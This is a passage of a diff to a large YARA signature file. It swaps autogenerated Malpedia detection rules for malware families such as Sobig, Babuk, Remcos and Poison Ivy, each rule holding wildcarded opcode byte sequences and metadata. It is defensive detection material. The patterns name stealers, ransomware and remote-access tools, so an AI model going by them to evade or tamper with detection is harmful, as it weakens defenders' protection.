"0a10ba676706f70e2749591376b958283b48eb8278fdd736f5378429d6ec57e3" + logic_hash = "ea76c04ceecd329a1dbc8646fe87d0982e2f7a41db170c209ba00ee2ed2e0d90" score = 75 quality = 75 tags = "FILE" @@ -179640,32 +182431,32 @@ rule MALPEDIA_Win_Sobig_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? ff35???????? 8d45dc 8bcf 6a00 50 } - $sequence_1 = { 53 50 ff75ec ff75d8 ff75dc ff15???????? 85c0 } - $sequence_2 = { 8a450f 33db 8d7e34 53 8bcf } - $sequence_3 = { 5f 5e c20400 53 56 ff742410 8bf1 } - $sequence_4 = { e8???????? dd4598 8b4de8 dd5db0 dd45a0 dd5db8 dd45a8 } - $sequence_5 = { 8d45b4 50 56 56 68???????? 56 56 } - $sequence_6 = { 8d4db0 e8???????? 8a45b0 83ec10 8bfc 8965e0 53 } - $sequence_7 = { 8b4d08 68???????? e8???????? 6a01 58 8945ec e9???????? } - $sequence_8 = { ff35???????? 8d45dc 8bcf 53 } - $sequence_9 = { ff7508 ff15???????? 85c0 7c43 ff7510 ff15???????? } + $sequence_0 = { 85c0 0f8511010000 c68514ffffff5b c68515ffffff3e c68516ffffff3e c68517ffffff20 } + $sequence_1 = { 8a8415fcfeffff 88840dfcfeffff 8b8df0feffff 8a95f8feffff 88940dfcfeffff } + $sequence_2 = { 6a00 8d4dbc 51 6801000080 ff15???????? 85c0 7407 } + $sequence_3 = { e8???????? 83c404 83c8ff eb44 8b8d24f7ffff 038d14f7ffff 898d24f7ffff } + $sequence_4 = { 8b8d10f7ffff ff510c 8b9564f7ffff 52 8b8510f7ffff ff500c 8b4df4 } + $sequence_5 = { 8d8d68f3ffff e8???????? e9???????? c78568f2ffff00000000 c645fc00 8d4df0 e8???????? } + $sequence_6 = { 33c0 8dbddefcffff f3ab 66ab c78594faffff00010000 8d9594faffff 52 } + $sequence_7 = { 8b4d10 894df8 c745ec00000000 eb09 8b55ec } + $sequence_8 = { e8???????? 8985a8fbffff 668b15???????? 668995ecfbffff b9ff000000 } + $sequence_9 = { e8???????? 83c404 e9???????? c7459801010000 8b9564ffffff 8955a4 8b45ec } condition: - 7 of them and filesize <262144 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Deltastealer_Auto : FILE +rule MALPEDIA_Win_Regretlocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e4bcf99b-e757-5705-a59b-a0722820f3d9" + id = "e84161b8-423e-557e-8de0-b1e67c3c2a4c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deltastealer_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.regretlocker_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "f3a202dde71406be69325c7d8bb3b580aed323825ecf5c600f5b385fd3e3e19c" + logic_hash = "54bb2aadd5c37dd020832b423319961afea1e93662e9effb9e0b762d9355990d" score = 75 quality = 75 tags = "FILE" @@ -179679,32 +182470,32 @@ rule MALPEDIA_Win_Deltastealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4883c428 c3 56 57 53 4883ec30 4c89c6 } - $sequence_1 = { 4d01c1 4c894c2420 4c89442428 c744243803001100 c744244803001100 488d5c2430 4c8d742440 } - $sequence_2 = { 57 53 4883ec40 4889d3 488b01 488b7008 488b7810 } - $sequence_3 = { 84c0 7416 4180bc240802000000 750b 488b842448010000 c60001 4584f6 } - $sequence_4 = { e8???????? 498b7610 31db 4839df 741e 8a041e 8d48bf } - $sequence_5 = { 89d7 48ffc3 49895e10 49f7e2 0f80a8000000 400fb6d7 4801d0 } - $sequence_6 = { c6474001 4889f9 e8???????? 4885c0 7438 4885d2 7433 } - $sequence_7 = { e8???????? 4489e3 488d4c2460 e8???????? 4989c7 eb21 4584e4 } - $sequence_8 = { 48895c2420 488d7c2430 41b830000000 41b910000000 4889f9 e8???????? 488b7f18 } - $sequence_9 = { 6601c8 0f92c2 81f9ffff0000 0f87d8feffff 84d2 0f85d0feffff 4d85f6 } + $sequence_0 = { 8945e0 3bd8 742a 83ec18 8bcc 53 } + $sequence_1 = { 8d8568ffffff 50 e8???????? 83ec10 c645fc04 8bcc 6a06 } + $sequence_2 = { e8???????? 6aff 8bcb e8???????? 8d8df4feffff e8???????? 8d8d78ffffff } + $sequence_3 = { 8d4510 50 8d8578fdffff 50 8d45ec 50 e8???????? } + $sequence_4 = { 2b45fc 6a18 59 99 f7f9 ff750c 6bc018 } + $sequence_5 = { 3bf0 59 59 0f95c0 5f 5e } + $sequence_6 = { 50 f2c3 55 8bec 8b4508 56 } + $sequence_7 = { 83ec18 8bcc 57 e8???????? e8???????? 83c418 8d4dbc } + $sequence_8 = { 50 57 ff15???????? 85c0 0f8529ffffff 57 ff15???????? } + $sequence_9 = { 64890d00000000 5b c9 c21800 8b411c 8b10 85d2 } condition: - 7 of them and filesize <3532800 + 7 of them and filesize <1021952 } -rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE +rule MALPEDIA_Win_Fusiondrive_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e45631fb-3fb5-58e0-9b9b-6b34d42ff6ce" + id = "d735e520-5418-5676-9517-95f81cfe7607" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kpot_stealer_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fusiondrive_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "16f05178ea617d4330175d94df8b79c29f673ce62148ecbf2153af87111da7a0" + logic_hash = "b988107dd8630d41b8dbc9f6aa013be888aa54392baf79daf500a205d72bf5ae" score = 75 quality = 75 tags = "FILE" @@ -179718,32 +182509,32 @@ rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03c6 50 ff75f4 e8???????? 59 59 8d4df8 } - $sequence_1 = { 0bce 8bc1 c1e804 33c2 250f0f0f0f 33d0 } - $sequence_2 = { 55 8bec ff7508 ff15???????? 83f8ff 7409 a8a7 } - $sequence_3 = { 8b4604 8b5df4 03d2 8d445802 e8???????? } - $sequence_4 = { 85c0 7427 8b45f8 03c6 50 } - $sequence_5 = { 57 8bf8 8b4518 0fb67005 } - $sequence_6 = { 8b45f4 c1e918 884b07 8945fc 8b45f0 83c308 ff4dec } - $sequence_7 = { 5e 5b c9 c3 0fb70f 6685c9 7440 } - $sequence_8 = { a8a7 7405 33c0 40 5d } - $sequence_9 = { 8bc1 c1e810 884306 8b45f4 } + $sequence_0 = { 48898620020000 0fb7c0 66f3ab 488d3d501c0100 482bfe 8a041f } + $sequence_1 = { 0f846f010000 660f6f05???????? f30f7f442470 66c745806557 c6458200 488d542470 488bc8 } + $sequence_2 = { 7735 488bd1 4983ff08 7203 } + $sequence_3 = { 4c8d4c2440 4983fd08 4d0f43cf 488d7c2420 4983fc08 490f43fa 4c8b5c2450 } + $sequence_4 = { 4863c9 4c8d0514070100 488bc1 83e13f 48c1f806 488d14c9 498b04c0 } + $sequence_5 = { 0fb60a 83e10f 4c8d05f899ffff 4a0fbe8401a8150100 } + $sequence_6 = { 488b542450 488bc8 488902 488b5310 ff15???????? 33c0 } + $sequence_7 = { ff15???????? 8d0c4501000000 4103cf 458d7c2402 418bd7 } + $sequence_8 = { ff15???????? 3db7000000 0f8432060000 33ff 8bcf } + $sequence_9 = { 7528 48897df7 48c745ff07000000 66897de7 } condition: - 7 of them and filesize <219136 + 7 of them and filesize <290816 } -rule MALPEDIA_Win_Kardonloader_Auto : FILE +rule MALPEDIA_Win_Wonknu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3f6a3bad-df12-536d-9e36-cfe1dc9fa562" + id = "ddaff543-6be8-5c88-9c2c-3d8f03caff26" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kardonloader_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wonknu_auto.yar#L1-L111" license_url = "N/A" - logic_hash = "4fe311b419f6bafe180c85c33e9d2d9d1da43b3315ab993943a70f218a823338" + logic_hash = "97458316dc025f2ef3806add4e0540e6bc317fe3a272c04393704aa62f6ae30d" score = 75 quality = 75 tags = "FILE" @@ -179757,32 +182548,32 @@ rule MALPEDIA_Win_Kardonloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e13f c1e806 03c3 8a0490 88443702 8a0419 8b4d0c } - $sequence_1 = { 5e 8be5 5d c3 6a00 ff15???????? cc } - $sequence_2 = { e8???????? 83c438 85c0 7405 83c004 } - $sequence_3 = { 56 ff7508 68???????? e8???????? 85c0 0f8421010000 } - $sequence_4 = { 50 56 e8???????? 83c40c 894714 b001 5f } - $sequence_5 = { e8???????? 59 50 8d8550faffff 50 } - $sequence_6 = { 50 ff35???????? ff35???????? e8???????? 83c438 e9???????? 5f } - $sequence_7 = { 750b c74704???????? 0fb7720a 6a05 58 663bf0 750e } - $sequence_8 = { c0e204 8b45fc 880c30 0fb6441f02 8a8018314000 c0e802 } - $sequence_9 = { 50 8d85e4fdffff 50 8d85e8feffff 68???????? 50 } + $sequence_0 = { e8???????? 8bfc b901050000 f3a5 8bcb } + $sequence_1 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? } + $sequence_2 = { b901050000 f3a5 8bcb e8???????? 803b00 } + $sequence_3 = { 6a04 50 ff15???????? 68???????? } + $sequence_4 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? 803b00 } + $sequence_5 = { e8???????? 8bfc b901050000 f3a5 } + $sequence_6 = { eb08 c6840550ffffff00 8d8550ffffff 50 } + $sequence_7 = { 53 56 57 6804140000 } + $sequence_8 = { c6840550ffffff00 8d8550ffffff 50 e8???????? } + $sequence_9 = { 8d7e28 57 ff15???????? 8b4608 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Babuk_Auto : FILE +rule MALPEDIA_Win_Wormhole_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d5eda12f-ea4b-52c1-b2a1-b261c48c105c" + id = "02cb6b4c-3f82-593d-8995-30894f37de3e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babuk_auto.yar#L1-L163" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wormhole_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "55094f2694a9f4921a100bba31a1afb9b9947feff6d1ffe3b263a4bd8f4c17f7" + logic_hash = "468c0b29b40a7f8149923ac2555699892601064a2e38020dd68e3cf5b3d71577" score = 75 quality = 75 tags = "FILE" @@ -179796,77 +182587,68 @@ rule MALPEDIA_Win_Babuk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 6800000100 e8???????? 83c404 } - $sequence_1 = { 50 ff15???????? 83f803 7502 } - $sequence_2 = { 8b45fc 83c002 8945fc 837dfc0a 0f83dc000000 8b4dfc } - $sequence_3 = { 8b4d08 8b540104 52 8b0401 50 e8???????? } - $sequence_4 = { 8b4dfc c1e108 ba01000000 d1e2 8b4508 } - $sequence_5 = { 8b95ccfdffff 83c201 8995ccfdffff 83bdccfdffff1f 735f 8d85f4fdffff } - $sequence_6 = { 8b4dfc 8b5508 8b44ca04 50 } - $sequence_7 = { 8b4d08 c7040100000000 c744010400000000 ba08000000 } - $sequence_8 = { 0bca 894dfc 8b45fc c1e008 b901000000 } - $sequence_9 = { 8b0401 50 e8???????? 83c408 8945ec 8955f0 } - $sequence_10 = { c744010400000000 ba08000000 6bc200 8b4d08 } - $sequence_11 = { 8b4508 c704107465206b c745fc00000000 eb09 } - $sequence_12 = { 744a 837dd801 7444 8b55ec 52 ff15???????? 8d45ac } - $sequence_13 = { e8???????? 83c410 c78574ffffff00000000 eb0f } - $sequence_14 = { 57 b808000000 6bc80a 8b5508 c7040a00000000 c7440a0400000000 c745fc00000000 } - $sequence_15 = { 51 e8???????? 83c408 8945f4 8955f8 } + $sequence_0 = { eb1b 3d04000100 752a a1???????? 68???????? 6a06 } + $sequence_1 = { 50 56 e8???????? 83c40c 8d4c2408 8d942414010000 } + $sequence_2 = { ffd3 6a00 6a00 89442418 8d442428 } + $sequence_3 = { e8???????? a1???????? 83c404 50 ff15???????? c705????????00000000 c705????????00000000 } + $sequence_4 = { 75f0 a1???????? 85c0 74d5 e8???????? } + $sequence_5 = { c705????????01000000 68f4010000 ff15???????? 8b15???????? 52 e8???????? } + $sequence_6 = { 85f6 7512 6a04 68???????? 6a28 57 e8???????? } + $sequence_7 = { 6a78 6a28 57 50 e8???????? } + $sequence_8 = { 8b442404 56 57 8b7c2410 6a78 6a28 } + $sequence_9 = { 7564 8b442418 3dff000000 7f59 6a0f } condition: - 7 of them and filesize <183296 + 7 of them and filesize <99576 } -rule MALPEDIA_Win_Makop_Ransomware_Auto : FILE +rule MALPEDIA_Win_Poison_Ivy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cd34e745-9497-5ffc-bd73-ecb5996e2067" - date = "2023-07-11" - modified = "2023-07-15" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makop_ransomware_auto.yar#L1-L124" + id = "ec8c2f98-412f-543c-9758-b1aacde91b4e" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poison_ivy_auto.yar#L1-L91" license_url = "N/A" - logic_hash = "3c7cc3419f322a8e9eb8473ecaf54fc5da0725e8a0f35ff3f90245e28389848b" + logic_hash = "431acfd8496c54390529508a28488eb12118d11f97e2de9a76cce0e819bacb59" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230705" - malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" - malpedia_version = "20230715" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb02 33f6 803d????????00 751f 803d????????00 7516 80fb01 } - $sequence_1 = { 52 50 51 e8???????? 8b542430 83c40c 68e0930400 } - $sequence_2 = { 52 66c7060802 66c746041066 c6460820 } - $sequence_3 = { 56 ff15???????? 85c0 750b 8906 32c0 5e } - $sequence_4 = { 83c001 84c9 75f7 2bc7 83e801 39442404 720a } - $sequence_5 = { ffd6 85ff 740f 85db 740b 837c242000 7404 } - $sequence_6 = { 8b2d???????? 3beb 742e 8b4524 3bc3 7407 50 } - $sequence_7 = { 7416 e8???????? 6a00 e8???????? 83c404 } - $sequence_8 = { e8???????? 8b442418 83c40c 8b4f0c } - $sequence_9 = { 742f 33c0 3906 763d 8d4c2448 } + $sequence_0 = { ff9681000000 80beaf08000001 7507 b902000080 eb05 } + $sequence_1 = { b902000080 eb05 b901000080 8d45fc } + $sequence_2 = { 51 ff5635 68ff000000 8d86b1060000 } + $sequence_3 = { 50 6a01 6a00 8d86120e0000 50 ff75fc } + $sequence_4 = { b901000080 8d45fc 50 683f000f00 6a00 57 51 } + $sequence_5 = { 51 57 ff9681000000 8d45fc } + $sequence_6 = { 8d86120e0000 50 ff75fc ff563d ff75fc ff5631 } condition: - 7 of them and filesize <107520 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Cosmicduke_Auto : FILE +rule MALPEDIA_Win_Whitebird_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a26b55b5-f92c-59e0-aeb7-97b4045e507d" + id = "18c8f315-82f9-5211-979b-cd91dd0f89f6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cosmicduke_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whitebird_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "ac4cc48798cdbb14b22137cd5139a9905a17da02e3b6c8aa744a86c9cd8ba953" + logic_hash = "9614af5c53f8ac08af22eb37dac785c96bbf80265ac7367d1874d42f77f5a2ec" score = 75 quality = 75 tags = "FILE" @@ -179880,32 +182662,32 @@ rule MALPEDIA_Win_Cosmicduke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff542418 83c602 47 3b742428 72ce 8b4514 } - $sequence_1 = { ff8688050000 b001 5f c3 6a1f 5a 8bc1 } - $sequence_2 = { c1e104 03cb 898439142c0000 e9???????? 3975e4 7408 ff75e4 } - $sequence_3 = { 8d7c241c e8???????? 3ac3 0f84ac010000 8b442420 89442430 8d842438200000 } - $sequence_4 = { 85db 7507 32c0 e9???????? 837d1400 74f3 807d1000 } - $sequence_5 = { 6a01 68???????? 56 53 e8???????? b001 5f } - $sequence_6 = { 8bc7 8d4c2414 e8???????? 53 8d44243c 50 } - $sequence_7 = { e8???????? 0fb7c0 894510 6685c0 7512 33c0 40 } - $sequence_8 = { ff7508 8bf0 8d85ecfdffff 50 ff15???????? 8b3d???????? } - $sequence_9 = { e8???????? 84c0 742f 838c244c300000ff 8d74240c e8???????? 8b4508 } + $sequence_0 = { 8a4302 84c0 7408 3c01 7404 } + $sequence_1 = { 8a4301 3c01 7404 3c02 } + $sequence_2 = { 8a4302 84c0 7408 3c01 7404 3c02 } + $sequence_3 = { eb09 80f92f 0f95c1 80c13f } + $sequence_4 = { 8a4302 84c0 7408 3c01 } + $sequence_5 = { ffb5c0fbffff 8930 ff15???????? 01b5c4fbffff ff8dbcfbffff 75dd ffb5c0fbffff } + $sequence_6 = { ff15???????? 488bcb ff15???????? b801000000 488b8c2480040000 4833cc e8???????? } + $sequence_7 = { 8b4d08 836d0808 d3e3 095d0c 46 3bf7 72ec } + $sequence_8 = { 488d542468 498bcd ffd0 3bc3 8bd0 7c28 8b442478 } + $sequence_9 = { 4833c4 4889842450250000 418bf9 458be0 448bf2 89542454 4c8be9 } condition: - 7 of them and filesize <456704 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Bluelight_Auto : FILE +rule MALPEDIA_Win_Transbox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "80cf9226-cefd-5819-9dda-98c83a2352a6" + id = "6493b67c-879c-5d38-8ca0-5969cb4aa6f0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bluelight_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.transbox_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "ac28d46c928f9de871e1c7301334eafe0ce66f50fc56cf0b475e83370bd02ded" + logic_hash = "d97e3f1924a5eeca38d9aa110b067c359caad44c72bb11cebc9ddfa66ee7e3d6" score = 75 quality = 75 tags = "FILE" @@ -179919,32 +182701,32 @@ rule MALPEDIA_Win_Bluelight_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7466400000000 6a01 8d4510 c645fc03 50 8d45e0 68???????? } - $sequence_1 = { e8???????? 85c0 0f85e1040000 8b55c0 8b4638 8d4aff 0fc9 } - $sequence_2 = { b97bfe0000 e8???????? 8945f8 8b4dfc e8???????? 83670c00 8b45f8 } - $sequence_3 = { 8bce e8???????? 8bd8 895dc4 85db 0f84bf0e0000 8b5348 } - $sequence_4 = { 884508 8b4204 8945d8 8b02 8b75d8 3b30 8b75f0 } - $sequence_5 = { f3a5 eb23 ff742420 68???????? eb92 8d4101 8bcb } - $sequence_6 = { ff248504d44600 6a00 c743140f000000 8bcb c7431000000000 68???????? c60300 } - $sequence_7 = { 7414 8bce e8???????? 814b0400000100 894308 8b45fc 8bd0 } - $sequence_8 = { e8???????? 8bd0 52 e8???????? 83c404 8b4518 8b4df4 } - $sequence_9 = { f7410400000400 7408 8b4114 8b4804 eb03 8b490c 85c9 } + $sequence_0 = { 64a300000000 eb24 8b048d90b60110 41 50 890d???????? ff15???????? } + $sequence_1 = { 33c9 83c414 85c0 0f9fc1 8bc1 8b4dfc 33cd } + $sequence_2 = { 8d4e04 c706???????? 832100 83610400 51 50 ff15???????? } + $sequence_3 = { e9???????? 55 8bec 56 8b7508 57 bf???????? } + $sequence_4 = { f7fb 56 8bf0 bbe0077e00 8bc3 2bc6 83f801 } + $sequence_5 = { f77dfc 50 51 e8???????? 83c40c 69c708020000 5f } + $sequence_6 = { 8bbdbcd3ffff 53 6a01 8d8d28e1ffff 885dfc } + $sequence_7 = { 8d85e8fdffff 6808020000 895dfc 53 50 89bddcfdffff 899de4fdffff } + $sequence_8 = { 33c9 8985dcfcffff 51 50 } + $sequence_9 = { 8d85f8faffff 50 e8???????? 8bd0 8b02 85c0 7402 } condition: - 7 of them and filesize <2191360 + 7 of them and filesize <288768 } -rule MALPEDIA_Win_Remcos_Auto : FILE +rule MALPEDIA_Win_Cloud_Duke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0b71eaff-61b4-55ab-a8af-3cf13e03dd61" + id = "cde391f0-175a-570d-9bc3-d49da6ef8745" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remcos_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloud_duke_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "d80be2f75bdd44294476100f6767031142d9f2872cceaebec5f1ed9745e8779f" + logic_hash = "74b144312fec28eba9f5a0427613a86e81c08ef3fe8c6af23e7d4ebef780ba1f" score = 75 quality = 75 tags = "FILE" @@ -179958,32 +182740,32 @@ rule MALPEDIA_Win_Remcos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7410 6a00 ff35???????? ff15???????? } - $sequence_1 = { 50 ff15???????? 8d45f0 33f6 } - $sequence_2 = { 6a09 ff35???????? ff15???????? ff35???????? ff15???????? } - $sequence_3 = { 8d45f8 50 ff15???????? ff7508 } - $sequence_4 = { 7508 ff15???????? 33c0 5f } - $sequence_5 = { 6a09 ff35???????? ff15???????? ff35???????? } - $sequence_6 = { ff15???????? 50 ff15???????? 8d45f0 33f6 } - $sequence_7 = { 50 6a28 ff15???????? 50 ff15???????? 8d45f0 33f6 } - $sequence_8 = { 51 51 8d45f8 c745f808000000 50 ff15???????? ff15???????? } - $sequence_9 = { 85c0 7410 6a00 ff35???????? ff15???????? } + $sequence_0 = { 8d4c2448 e8???????? 50 8d8c240c010000 e8???????? 8d4c2448 e8???????? } + $sequence_1 = { 8d8c240c010000 e8???????? 8d4c2460 e8???????? } + $sequence_2 = { 83fe04 7ce3 8b45e8 4b 8ad4 } + $sequence_3 = { 8d8c24d8000000 e8???????? 51 8d442434 } + $sequence_4 = { 50 e8???????? 8b7c2440 46 3bf7 } + $sequence_5 = { eb0a 8b9dd8fbffff eb02 8bde 8b85e8fbffff 8d95e4fbffff 52 } + $sequence_6 = { 85c9 7438 83fa01 7533 83bedc00000008 8d86c8000000 7202 } + $sequence_7 = { 8d04450c000000 50 6a00 57 } + $sequence_8 = { eb02 8bce 8b5518 ff75fc 03d2 895510 } + $sequence_9 = { 6806020000 50 668984241c010000 8d84241e010000 50 c744245c00000000 e8???????? } condition: - 7 of them and filesize <1054720 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Syscon_Auto : FILE +rule MALPEDIA_Win_Unidentified_069_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "10b2a70f-de71-5dcd-8008-91d876f6f351" + id = "26eb5c23-2d98-5320-b3d2-36b6e8a74eb7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.syscon_auto.yar#L1-L166" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_069_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "f7cdfe4679f457a034e50dc400c88cdf6f80bb02175055d824368da084861b59" + logic_hash = "c4b44dbf77c8a02d5a553e1bfca3c92784cdebd7456417ad5b23ba2172632d6b" score = 75 quality = 75 tags = "FILE" @@ -179997,38 +182779,32 @@ rule MALPEDIA_Win_Syscon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e4f8 81ecdc0b0000 a1???????? 33c4 898424d80b0000 53 56 } - $sequence_1 = { 0f84af000000 53 57 8bc6 e8???????? 83c408 } - $sequence_2 = { 0f84d8000000 6a00 8d4dfc 51 53 } - $sequence_3 = { ffd7 8d4c2428 51 8d942414040000 68???????? } - $sequence_4 = { 88040f 47 897df8 8b45f4 03c6 } - $sequence_5 = { ffd6 68???????? ffd6 5f 5e b801000000 } - $sequence_6 = { ffd6 68???????? c745fc00000000 ffd6 } - $sequence_7 = { 8935???????? ffd7 8d5e01 85c0 7539 a1???????? } - $sequence_8 = { ff15???????? 488905???????? 4885c0 0f84fbf8ffff } - $sequence_9 = { 4885c0 7486 488364242000 4c8d8d90030000 448bc3 488bd0 488bcf } - $sequence_10 = { 80bd3006000020 418bce 7511 488d8530060000 } - $sequence_11 = { 33d2 e8???????? 488d0da4320000 ff15???????? 488d9520040000 488d0d90320000 448bc0 } - $sequence_12 = { 488d8d10020000 ff15???????? 488d4d90 448bc3 } - $sequence_13 = { 488d5590 488d0daa300000 448bc0 e8???????? } - $sequence_14 = { 488d542450 488d0dad290000 448bc0 e8???????? 488b0d???????? } - $sequence_15 = { 488d4c2420 4c8bc6 33d2 e8???????? 488d0dc5450000 } + $sequence_0 = { ffd3 33c0 5f 5b c9 c20400 55 } + $sequence_1 = { 8bc6 c1e710 e8???????? 0fb7c0 0bc7 8945cc } + $sequence_2 = { ff15???????? 8b3d???????? 8945f0 3bc6 7460 53 } + $sequence_3 = { 85c0 7520 ff7508 e8???????? 85c0 7414 ff7508 } + $sequence_4 = { 68???????? 891d???????? 891d???????? ffd6 8b35???????? 68???????? ffd6 } + $sequence_5 = { 84c0 7504 c645fa01 807dfbff 6a08 5b 0f8581000000 } + $sequence_6 = { 52 51 50 e8???????? 015608 837de000 8b4608 } + $sequence_7 = { 7447 8d85c8fdffff 50 e8???????? 6811270000 56 } + $sequence_8 = { 83e924 85ff 77f3 3bf8 7427 85ff 750e } + $sequence_9 = { 837d0800 0f85a0000000 e8???????? 8bf0 85f6 0f8491000000 } condition: - 7 of them and filesize <120832 + 7 of them and filesize <434176 } -rule MALPEDIA_Win_Ratankbapos_Auto : FILE +rule MALPEDIA_Win_Sathurbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5159f055-afb3-5653-8c2e-8b4cd00d6051" + id = "74231d79-bc89-53a0-abc2-544d7739c735" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos" - source_url = 